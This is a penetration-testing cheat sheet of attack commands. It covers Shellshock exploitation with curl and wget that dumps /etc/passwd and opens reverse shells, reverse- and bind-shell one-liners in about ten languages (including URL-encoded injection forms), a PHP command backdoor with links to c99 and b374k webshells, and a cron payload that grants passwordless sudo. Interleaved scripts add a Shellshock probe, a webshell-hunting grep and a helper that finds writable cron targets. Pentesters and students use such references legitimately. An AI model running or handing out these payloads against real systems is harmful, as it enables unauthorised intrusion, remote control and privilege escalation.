Pentest Killer Commands

Cheat Sheets

Vulnerability assessment

Scanning a web application with nikto through a proxy (the option is -useproxy):

nikto -host 192.168.xx.xx -useproxy http://192.168.xx.xx:3129

dirb (directory brute force) with a proxy:

dirb http://192.168.XX.XX -p 192.168.XX.XX:3129

WPScan with a proxy (the option takes two dashes):

wpscan --url 192.168.XX.XX/dir --proxy 192.168.XX.XX:3128

Curl Commands

Fetching a page through a proxy (-x and --proxy are the same option):

  1. curl 192.168.XX.XX/robots.txt -x 192.168.XX.XX:3128
  2. curl --proxy 192.168.37.129:3128 http://192.168.37.129:80/robots.txt

Fetch in verbose mode (-v prints the request and the response headers, which is where the server banner and any proxy headers show up):

 curl -v 192.168.37.129 --proxy 192.168.37.129:3128

Shellshock exploitation with curl (the function definition is sent in a header that the CGI handler exports into bash's environment; $CMD is the command to run, and the leading echo terminates the HTTP headers so the command output lands in the response body):

curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status

Examples (-A is shorthand for setting the User-Agent; the second command opens a reverse shell to 192.168.32.41:443, so start a listener there first):

curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status
curl -x http://192.168.37.129:3128 -A "() { :; };/bin/sh -i >& /dev/tcp/192.168.32.41/443 0>&1" http://192.168.37.129/cgi-bin/status

Reverse Shell with Curl (needs a listener on XXX.XXX.XXX.XXX:80; the User-Agent carries the mkfifo/nc payload from the Bash list below, and the POST body injects a newline followed by sh </proc/self/environ so the request's environment, User-Agent included, is executed as a shell script):

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

Shellshock exploitation with wget (-U sets the User-Agent, -O- writes the response to stdout; the second command opens a bash reverse shell to 192.168.79.173:4444):

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"
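Two checks that go with the curl and wget payloads above, as an added example rather than part of the original cheat sheet: a local test of whether the bash on a box still imports function definitions from its environment (Shellshock, CVE-2014-6271), and a CGI probe that injects a unique marker instead of a fixed command, so a page that happens to contain the expected output cannot produce a false positive. The CGI URL and the proxy are placeholders supplied by the caller.

```shell
#!/bin/sh
# Shellshock (CVE-2014-6271) checks: local bash test plus a remote CGI probe.
# Added example for this cheat sheet; the URL and proxy arguments are placeholders.

# Local check. A vulnerable bash parses the function definition in the
# environment variable and runs the trailing command while doing so.
# $1 = bash binary to test (default: the bash on PATH). Prints vulnerable/patched.
shellshock_local_check() {
  bash_bin=${1:-bash}
  out=$(env x='() { :;}; echo vulnerable' "$bash_bin" -c 'echo test' 2>/dev/null || true)
  case "$out" in
    *vulnerable*) echo vulnerable ;;
    *) echo patched ;;
  esac
}

# Remote probe. The function definition rides in User-Agent (any header the CGI
# exports into its environment works). The two echos end the HTTP headers, then
# the marker is printed into the body; finding it there proves code execution.
# $1 = URL of a CGI script, $2 = optional proxy host:port.
shellshock_cgi_probe() {
  url=$1; proxy=$2
  marker="shellshock_probe_$$_$(date +%s)"
  set -- -s --max-time 10 -H "User-Agent: () { :; }; echo; echo; echo $marker" "$url"
  if [ -n "$proxy" ]; then set -- --proxy "$proxy" "$@"; fi
  body=$(curl "$@" 2>/dev/null || true)
  case "$body" in
    *"$marker"*) echo vulnerable ;;
    *) echo not-vulnerable ;;
  esac
}

# Stand-alone usage: ./shellshock_check.sh [cgi-url] [proxy]
printf 'local bash: %s\n' "$(shellshock_local_check)"
if [ -n "$1" ]; then
  printf '%s: %s\n' "$1" "$(shellshock_cgi_probe "$1" "$2")"
fi
```

Once the probe reports vulnerable, swap the marker echo for any of the payloads above; keep the leading echos, otherwise the command output is sent before the headers are complete and the web server discards the response.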

Spawn Shell

Spawn Python TTY shell (on the attacker side, Ctrl-Z then stty raw -echo; fg turns the result into a fully interactive terminal):

python -c 'import pty; pty.spawn("/bin/bash")'

Spawn interactive sh shell:

/bin/sh -i

Spawn Perl shell (the first form from inside an existing Perl script, the second from the command line; the switch is -e):

exec "/bin/sh";

perl -e 'exec "/bin/sh";'

Spawn Ruby shell (from irb, or from the command line):

exec "/bin/sh"

ruby -e 'exec "/bin/sh"'

Spawn shell from the vi editor (type it in command mode; :sh also works and uses the shell option):

:!bash

Spawn TTY shell from Nmap (only older Nmap releases that still ship --interactive; run nmap --interactive and type it at the nmap> prompt):

!sh

Reverse Shells

Kali webshell directory (ready-made shells for PHP, Perl, ColdFusion, ASP/ASPX and JSP):

root@kali:/usr/share/webshells# ls -ltr
total 0
drwxr-xr-x 2 root root 183 Jan 20 2016 php
drwxr-xr-x 2 root root 63 Jan 20 2016 perl
drwxr-xr-x 2 root root 33 Jan 20 2016 cfm
drwxr-xr-x 2 root root 34 Jan 20 2016 aspx
drwxr-xr-x 2 root root 56 Jan 20 2016 asp
drwxr-xr-x 1 root root 40 Feb 8 09:44 jsp
root@kali:/usr/share/webshells#

Bash (/dev/tcp is a bash feature and is missing from dash, Debian's /bin/sh; item 5 needs only sh and nc):

  1. bash -i >& /dev/tcp/ATTACKERS_IP/PORT 0>&1
  2. exec /bin/bash 0<&0 2>&0
  3. 0<&196;exec 196<>/dev/tcp/ATTACKERS_IP/80; sh <&196 >&196 2>&196
  4. exec 5<>/dev/tcp/ATTACKERS_IP/80; cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  5. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.156.130 445 >/tmp/f

Note: item 2 does not open a connection by itself; it replaces the current shell with bash and sends stderr into the socket already attached to stdin.

Example (the second line is the same payload dropped into a command-injection parameter; URL-encode it before sending):

bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"
http://192.168.XX.XX:8080/?page=1&rcmd=bash -c "bash -i >& /dev/tcp/ATTACKERS_IP/31337 0>&1"

PHP:

php -r '$sock=fsockopen("ATTACKERS_IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: the socket usually lands on file descriptor 3. Replace 3 with 4, 5 or 6 if it doesn't work.

Netcat (-e is missing from many builds, including the OpenBSD netcat shipped by Debian and Ubuntu; items 2 and 3 avoid it):

  1. nc -e /bin/sh ATTACKERS_IP PORT
  2. /bin/sh | nc ATTACKERS_IP PORT
  3. rm -f /tmp/p; mknod /tmp/p p && nc ATTACKERS_IP 4444 0</tmp/p | /bin/sh 1>/tmp/p

Example:

nc -e /bin/sh 192.168.37.122 4444

Telnet (no /dev/tcp or nc needed; item 2 uses two connections, input on port 80 and output on port 443, so start two listeners):

  1. rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/bash 1>/tmp/p
  2. telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Example:

telnet 192.168.37.130 80 | /bin/bash | telnet 192.168.37.130 443

 

Perl:

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Example:

perl -e 'use Socket;$i="192.168.1.XX";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows (item 1 does not depend on /bin/sh and is the one to use on Windows; item 2 is the Unix one-liner above and only works where /bin/sh exists, e.g. under Cygwin):

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  2. perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby:

ruby -rsocket -e 'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Java (this is Groovy syntax, as accepted by Groovy script consoles: untyped variables and the as String[] cast; it hands the bash /dev/tcp shell from item 4 above to Runtime.exec):

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Example:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Python reverse shell, URL-encoded so it survives a GET parameter (the same one-liner, pointed at 192.168.110.50:443; spaces, quotes, commas, semicolons, slashes and brackets are the characters that must be encoded):

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.110.50%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

Example (shown decoded for readability; send the parameter value in the encoded form above):

http://192.168.XX.XX:port/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Gawk (note that this is a bind shell, not a reverse shell: it listens on port 8080 on the target and serves a bkd> prompt, so connect to it with nc; save it as a file and run it with gawk -f):

#!/usr/bin/gawk -f
BEGIN {
    Port    = 8080
    Prompt  = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}

Building an exploit

Cross compile 32 bit binary on 64 bit Linux:

gcc -m32 exploit.c -o exploit

 

Cross compile 32 windows .exe on Linux:

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

 

Shell Shock

() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1

 

Backdoors

PHP:

<?php system($_REQUEST[cmd]); ?>

Shells

DAws.php:
https://github.com/dotcppfile/DAws/blob/master/DAws.php

c99:
https://github.com/tennc/webshell/blob/master/php/PHPshell/c99shell/c99shell.php

b374k shell 3.2:
https://github.com/b374k/b374k
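From the defender's side, the one-liner backdoor and the shells linked above share a small number of tells: request input, or a decoding function, fed straight into a PHP execution sink, plus the names the larger shells carry in their own source. This added example (not from the original page) greps a web root for those patterns and lists recently modified PHP files, which is how a dropped shell usually stands out during incident response. The regex is a starting point and will need tuning for a real code base; legitimate code can trip it.

```shell
#!/bin/sh
# Hunt for dropped PHP shells in a web root. Added example; the pattern list is a
# starting point, not a complete signature set, and legitimate code can match it.
LC_ALL=C; export LC_ALL

# Execution sinks that take request input or a decoder directly, plus the names
# the well-known c99 and b374k shells carry in their own source.
WEBSHELL_RE='(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)[[:space:]]*\([[:space:]]*(\$_(REQUEST|GET|POST|COOKIE)|base64_decode|gzinflate|gzuncompress|str_rot13)|c99shell|b374k'

# $1 = web root. Prints matching .php files, sorted, one per line.
find_webshells() {
  find "$1" -type f -name '*.php' -exec grep -lE "$WEBSHELL_RE" {} + 2>/dev/null | sort
}

# $1 = web root, $2 = days. PHP files modified within the last N days, which is
# what a freshly uploaded shell looks like next to an old code base.
find_recent_php() {
  find "$1" -type f -name '*.php' -mtime "-$2" 2>/dev/null | sort
}

# Stand-alone usage: ./find_webshells.sh /var/www/html [days]
if [ -n "$1" ]; then
  echo "suspicious patterns:"; find_webshells "$1"
  echo "modified in the last ${2:-7} day(s):"; find_recent_php "$1" "${2:-7}"
fi
```

Run it from a trusted shell against a mounted copy of the web root where possible; a compromised host may have a modified find or grep on PATH.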

 

Privilege escalation

Cron job abuse (write into a script that root's cron runs; the payload grants the low-privilege user passwordless sudo). Caveats: sudo refuses to run at all while /etc/sudoers is world-writable, i.e. between the two chmods, and a syntax error in the appended line breaks sudo for everyone, so check the result with visudo -c:

echo 'chmod 777 /etc/sudoers && echo "<user name (LOW priv)> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /dir/<cronfile to run>
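To find a target for the technique above, list the scripts that cron entries point at and check which of them an unprivileged user can write to. This added example (not part of the original page) does that over a crontab file in /etc/crontab format and then emits a payload that installs the sudo rule as a drop-in under /etc/sudoers.d, validated with visudo -c, instead of opening /etc/sudoers itself. It assumes the distribution's sudoers includes /etc/sudoers.d, as Debian, Ubuntu and RHEL do; the user name and file paths are placeholders.

```shell
#!/bin/sh
# Find world-writable scripts referenced by cron and build the sudo payload.
# Added example; user names and paths are placeholders.
LC_ALL=C; export LC_ALL

# $1 = crontab file in /etc/crontab or /etc/cron.d format (schedule, user, command).
# Prints every existing absolute path mentioned by an entry that others can write.
# Commands resolved through PATH (no leading slash) are not checked.
cron_writable_targets() (
  set -f   # schedule fields such as */5 must not glob-expand in the for loop
  grep -Ev '^[[:space:]]*(#|$)' "$1" | while IFS= read -r line; do
    for tok in $line; do
      case "$tok" in
        /*)
          [ -f "$tok" ] || continue
          # ls -l mode string: character 9 is the "other" write bit
          case "$(ls -ld "$tok")" in
            ????????w*) printf '%s\n' "$tok" ;;
          esac ;;
      esac
    done
  done
)

# $1 = low-privilege user. The line to append to a writable cron script: when
# root's cron runs it, the user gets passwordless sudo. A drop-in under
# /etc/sudoers.d (assumed to be included by the main sudoers file) never leaves
# /etc/sudoers world-writable, and visudo -cf removes a malformed file instead
# of leaving sudo broken. File names in sudoers.d must not contain a dot.
cron_sudo_payload() {
  f="/etc/sudoers.d/$1"
  printf '%s\n' "echo '$1 ALL=(ALL) NOPASSWD: ALL' > $f && chmod 440 $f && visudo -cf $f || rm -f $f"
}

# Stand-alone usage: ./cron_check.sh /etc/crontab lowpriv
if [ -n "$1" ]; then
  for t in $(cron_writable_targets "$1"); do
    echo "world-writable cron target: $t"
    if [ -n "$2" ]; then echo "  payload: $(cron_sudo_payload "$2")"; fi
  done
fi
```

Also check /etc/cron.d/*, /etc/cron.hourly and the per-user crontabs under /var/spool/cron: the same function works on any file in the system crontab format, and a directory the script lives in being writable is as good as the script itself.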

 

Reference sites for enumeration:

http://www.speedguide.net/port.php?port=8080
https://www.youtube.com/user/myexploit2600
https://myexploit.wordpress.com/port-number-exploits/
https://docs.google.com/uc?export=download&confirm=wKvF&id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU
https://myexploit.wordpress.com/control-metasploit-post-exploits/
http://www.bekkoame.ne.jp/~s_ita/port/port1-99.html
http://www.speedguide.net/ports_sg.php
https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/

http://www.vulnerabilityassessment.co.uk/nfs.htm

https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/

https://www.pentestpartners.com/blog/using-nfsshell-to-compromise-older-environments/

Reference links for LFI:

https://highon.coffee/blog/lfi-cheat-sheet/

iptables rules:

https://www.suse.com/communities/blog/basic-iptables-tutorial/